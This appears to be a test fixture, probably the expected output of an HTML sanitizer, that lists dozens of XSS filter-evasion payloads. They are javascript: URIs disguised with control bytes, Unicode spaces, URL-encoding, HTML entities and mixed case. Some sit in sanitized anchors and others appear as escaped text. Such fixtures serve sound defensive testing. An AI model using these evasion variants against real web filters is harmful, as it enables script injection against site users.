1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85
|
<p><a>Click me</a></p>
<p><a href="java%0Ascript:alert(%22XSS%22)">Click me</a></p>
<p><a href="java%0Ascript:alert(document.location)">link</a></p>
<p><a>javascript:alert("XSS")</a></p>
<p><img src="data:image/gif;base64,R0lGODlhEAAQAMQAAORHHOVSKudfOulrSOp3WOyDZu6QdvCchPGolfO0o/XBs/fNwfjZ0frl3/zy7////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAkAABAALAAAAAAQABAAAAVVICSOZGlCQAosJ6mu7fiyZeKqNKToQGDsM8hBADgUXoGAiqhSvp5QAnQKGIgUhwFUYLCVDFCrKUE1lBavAViFIDlTImbKC5Gm2hB0SlBCBMQiB0UjIQA7" alt="Inline image" /></p>
<p>)</p>
<p><javas\x00cript:javascript:alert(1)></p>
<p><javas\x01cript:javascript:alert(1)></p>
<p><javas\x02cript:javascript:alert(1)></p>
<p><javas\x03cript:javascript:alert(1)></p>
<p><javas\x04cript:javascript:alert(1)></p>
<p><javas\x05cript:javascript:alert(1)></p>
<p><javas\x06cript:javascript:alert(1)></p>
<p><javas\x07cript:javascript:alert(1)></p>
<p><javas\x08cript:javascript:alert(1)></p>
<p>javas\x09cript:javascript:alert(1)></p>
<p><javas\x0Acript:javascript:alert(1)></p>
<p><javas\x0Bcript:javascript:alert(1)></p>
<p><javas\x0Ccript:javascript:alert(1)></p>
<p><javas\x0Dcript:javascript:alert(1)></p>
<p><javascript\x3Ajavascript:alert(1)></p>
<p><\x0Bjavascript:javascript:alert(1)></p>
<p><\x0Fjavascript:javascript:alert(1)></p>
<p><\xC2\xA0javascript:javascript:alert(1)></p>
<p><\x05javascript:javascript:alert(1)></p>
<p><\xE1\xA0\x8Ejavascript:javascript:alert(1)></p>
<p><\x18javascript:javascript:alert(1)></p>
<p><\x11javascript:javascript:alert(1)></p>
<p><\xE2\x80\x88javascript:javascript:alert(1)></p>
<p><\xE2\x80\x89javascript:javascript:alert(1)></p>
<p><\xE2\x80\x80javascript:javascript:alert(1)></p>
<p><\x17javascript:javascript:alert(1)></p>
<p><\x03javascript:javascript:alert(1)></p>
<p><\x0Ejavascript:javascript:alert(1)></p>
<p><\x1Ajavascript:javascript:alert(1)></p>
<p><\x00javascript:javascript:alert(1)></p>
<p><\x10javascript:javascript:alert(1)></p>
<p><\xE2\x80\x82javascript:javascript:alert(1)></p>
<p><\x20javascript:javascript:alert(1)></p>
<p><\x13javascript:javascript:alert(1)></p>
<p><\x09javascript:javascript:alert(1)></p>
<p><\xE2\x80\x8Ajavascript:javascript:alert(1)></p>
<p><\x14javascript:javascript:alert(1)></p>
<p><\x19javascript:javascript:alert(1)></p>
<p><\xE2\x80\xAFjavascript:javascript:alert(1)></p>
<p><\x1Fjavascript:javascript:alert(1)></p>
<p><\xE2\x80\x81javascript:javascript:alert(1)></p>
<p><\x1Djavascript:javascript:alert(1)></p>
<p><\xE2\x80\x87javascript:javascript:alert(1)></p>
<p><\x07javascript:javascript:alert(1)></p>
<p><\xE1\x9A\x80javascript:javascript:alert(1)></p>
<p><\xE2\x80\x83javascript:javascript:alert(1)></p>
<p><\x04javascript:javascript:alert(1)></p>
<p><\x01javascript:javascript:alert(1)></p>
<p><\x08javascript:javascript:alert(1)></p>
<p><\xE2\x80\x84javascript:javascript:alert(1)></p>
<p><\xE2\x80\x86javascript:javascript:alert(1)></p>
<p><\xE3\x80\x80javascript:javascript:alert(1)></p>
<p><\x12javascript:javascript:alert(1)></p>
<p><\x0Djavascript:javascript:alert(1)></p>
<p><\x0Ajavascript:javascript:alert(1)></p>
<p><\x0Cjavascript:javascript:alert(1)></p>
<p><\x15javascript:javascript:alert(1)></p>
<p><\xE2\x80\xA8javascript:javascript:alert(1)></p>
<p><\x16javascript:javascript:alert(1)></p>
<p><\x02javascript:javascript:alert(1)></p>
<p><\x1Bjavascript:javascript:alert(1)></p>
<p><\x06javascript:javascript:alert(1)></p>
<p><\xE2\x80\xA9javascript:javascript:alert(1)></p>
<p><\xE2\x80\x85javascript:javascript:alert(1)></p>
<p><\x1Ejavascript:javascript:alert(1)></p>
<p><\xE2\x81\x9Fjavascript:javascript:alert(1)></p>
<p><\x1Cjavascript:javascript:alert(1)></p>
<p><javascript\x00:javascript:alert(1)></p>
<p><javascript\x3A:javascript:alert(1)></p>
<p><javascript\x09:javascript:alert(1)></p>
<p><javascript\x0D:javascript:alert(1)></p>
<p><javascript\x0A:javascript:alert(1)></p>
<p><java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)></p>
<p><jav&#65ascript:javascript:alert(1)></p>
<p><jav&#97ascript:javascript:alert(1)></p>
<p><a>jAvAsCrIpT:alert(1)</a></p>
<p><a>XSS</a></p>
<p><a>XSS</a></p>
<p><a href="javascript&colon;alert%28'XSS'%29">XSS</a></p>
|